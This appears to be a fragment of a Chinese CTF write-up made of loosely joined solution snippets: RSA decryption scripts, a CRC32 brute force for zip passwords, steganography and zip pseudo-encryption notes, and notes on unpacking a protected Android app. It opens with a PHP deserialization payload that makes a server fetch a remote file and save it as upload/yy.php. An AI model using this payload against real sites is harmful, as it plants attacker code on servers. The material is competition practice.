<?php class copy_file{ public $path = 'upload/'; public $file="yy.php"; public $url='http://127.0.0.1:80/?url=http://120.xxxx56/1.txt'; } echo urlencode(serialize(new copy_file())); ?>
import gmpy2 from Crypto.Util.number import * from binascii import a2b_hex,b2a_hex
flag = "*****************"
c = 38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192 p = 28805791771260259486856902729020438686670354441296247148207862836064657849735343618207098163901787287368569768472521344635567334299356760080507454640207003 q = 15991846970993213322072626901560749932686325766403404864023341810735319249066370916090640926219079368845510444031400322229147771682961132420481897362843199 e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619 n=p*q phi=(p-1)*(q-1)
d=int(gmpy2.invert(e,phi)) m=pow(c,d,n)
print(m)
另类的RSA
先在线网址分解一下n得到pq
1 2 3 4 5 6 7 8
import gmpy2 e=31 q=59 p=61 d=gmpy2.invert(e,(p-1)*(q-1)) print d
import binascii import string strings = string.printable pwd = [''] * 5 crcs = [0x07d3f356, 0xd878a99d, 0x4e25a843, 0x6e16e99d, 0x549248b9] for a in strings: for b in strings: for c in strings: crc = binascii.crc32((a + b + c).encode()) for i inrange(5): if (crc & 0xFFFFFFFF) == crcs[i]: pwd[i] = a+b+c for i in pwd: print(i, end='')
dic=dict() d={} s=set() s='fk{hbeawfikn .l;jsg[op{ewhtgfkjbarASPUJF923U5 RJO9key3Y2905-RYHWEIOT{YU2390IETGHBF{}FUJse{ikogh{bwieukeyyjvgb"akkeysyh{k;yhweaukyeyoitgbsdakey{jg89gS}OYHqw8{}9ifgbDFHIOGHJ{fbiosGFBJKSgbfuiyoEGJWEbfv}yek' d=dict() for x in s: if x notin d.keys(): d[x]=1 else: d[x]=d[x]+1 print(sorted(d.items(), key = lambda i:i[1],reverse=True))
反复测试进行再次排序,次数都为4的不要,即可获得key{bgfi9JaFHhosw}
解密获得包3tip3.txt
测试为零宽隐写,然还white脑测是snow,
牛气冲天
开局伪加密
,解压获得cattle.jpg以及zip,
脑洞密码就是文件名
,
获得密码,解压zip,获得png,改高度获得flag
移动安全
android1
app进行了梆梆加固,开始准备环境安装dump dex,准备完开始安装app发现报错。
后面才发现了是因为app没有签名,
签上名后还要注意:安装时带上-t选项。原因:
Android Studio 3.0会在debug apk的manifest文件application标签里自动添加 android:testOnly="true"属性。